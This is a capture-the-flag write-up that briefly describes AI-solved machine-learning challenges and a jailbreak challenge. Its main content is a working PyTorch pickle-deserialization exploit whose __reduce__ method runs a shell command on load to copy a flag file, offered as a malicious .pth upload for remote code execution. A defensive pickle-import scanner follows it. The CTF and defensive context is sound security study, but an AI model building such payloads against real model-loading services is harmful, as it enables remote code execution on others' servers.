Contents
[Aura JailBreak](#Aura JailBreak)
[🔥🌸 LittFlower: Fire Boom! 🌸🔥](#🔥🌸 LittFlower: Fire Boom! 🌸🔥)
许哥的数字游戏
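The task is simply to train a model on the data provided by the challenge so that it recognizes digits.

First, have an AI interpret the contents of the attachment.

Then have the AI train a model on the dataset.

Describe the challenge's interaction protocol to the AI and have it write a solve script to get the flag.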

🤫歌的😡🔥

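The attachment contains two kinds of images: ones with fire and ones without.

Again, have the AI train the model and write the interaction script.

Got the flag.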

Aura JailBreak

明阳未许
Same as before: the AI solved it instantly.


🔥🌸 LittFlower: Fire Boom! 🌸🔥

```python
import torch
import torch.nn as nn
from torchvision import models
import builtins
import os


class MaliciousMobileNetV2(models.MobileNetV2):
    def __init__(self, num_classes=2):
        super().__init__(num_classes=num_classes)

    # pickle calls __reduce__ when the object is saved; the callable and
    # arguments it returns are invoked again when the file is loaded.
    def __reduce__(self):
        state_dict = self.state_dict()
        fake_state_dict = state_dict.copy()
        if "classifier.1.weight" in fake_state_dict:
            del fake_state_dict["classifier.1.weight"]
        if "classifier.1.bias" in fake_state_dict:
            del fake_state_dict["classifier.1.bias"]
        cmd = "import os; os.system('cp /flag /app/static/flag.txt')"
        # eval runs exec(cmd) and then hands back the state dict, so the
        # loader still receives a dict-like result.
        return (builtins.eval, (
            "(exec(cmd), state_dict)[1]",
            {'cmd': cmd, 'state_dict': fake_state_dict}
        ))


if __name__ == '__main__':
    model = MaliciousMobileNetV2(num_classes=2)
    save_path = 'evil.pth'
    print(f"正在生成 Payload: {save_path} ...")
    torch.save(model, save_path)
    print("生成成功!")
```
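Upload the .pth file generated by the script. When the server loads the model, pickle deserialization is triggered, which gives RCE and the flag.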
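
The upload above works because loading a fully pickled model imports and calls whatever the stream names. As an added example (not part of the original writeup), here is a stdlib-only pre-load check that lists the imports inside a zip-format .pth without unpickling it; the allowlist, the `Probe` class, the `archive/data.pkl` member name and the sample archives are assumptions constructed for illustration.

```python
import builtins, collections, io, pickle, pickletools, zipfile

# Assumed allowlist for a plain state_dict checkpoint; extend it for your models.
ALLOWED = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2"),
           ("torch", "FloatStorage")}
NO_PUSH = {"PROTO", "FRAME", "MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}
STRINGS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def pickle_globals(data):
    """List every (module, name) the stream would import. Nothing is executed."""
    found, tail = [], [None, None]
    for op, arg, _pos in pickletools.genops(data):
        if op.name in NO_PUSH:
            continue                       # these opcodes leave the stack unchanged
        if op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: the two values below it
            # A name fetched from the memo stays unresolved and fails the allowlist.
            found.append(tuple(s or "<unresolved>" for s in tail))
        tail = [tail[1], arg if op.name in STRINGS else None]
    return found

def disallowed_globals(blob):
    """Return imports outside ALLOWED in a zip-format .pth; reject anything else."""
    if not zipfile.is_zipfile(io.BytesIO(blob)):
        raise ValueError("not a zip-format checkpoint")
    bad = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.endswith(".pkl"):
                bad += [g for g in pickle_globals(zf.read(name)) if g not in ALLOWED]
    return bad

def make_pth(obj, protocol):
    """Constructed sample: wrap one pickle in a zip, as torch.save does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pickle.dumps(obj, protocol=protocol))
    return buf.getvalue()

class Probe:
    """Constructed stand-in for a hostile object; its reduce target is harmless."""
    def __reduce__(self):
        return (builtins.eval, ("1+1",))

if __name__ == "__main__":
    print(disallowed_globals(make_pth(collections.OrderedDict(w=1), 2)))
    print(disallowed_globals(make_pth(Probe(), 4)))
```

On the loading side, `torch.load(path, weights_only=True)` enforces a similar restriction inside the unpickler, and accepting only state dicts rather than whole pickled models removes the need to import arbitrary classes at all.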
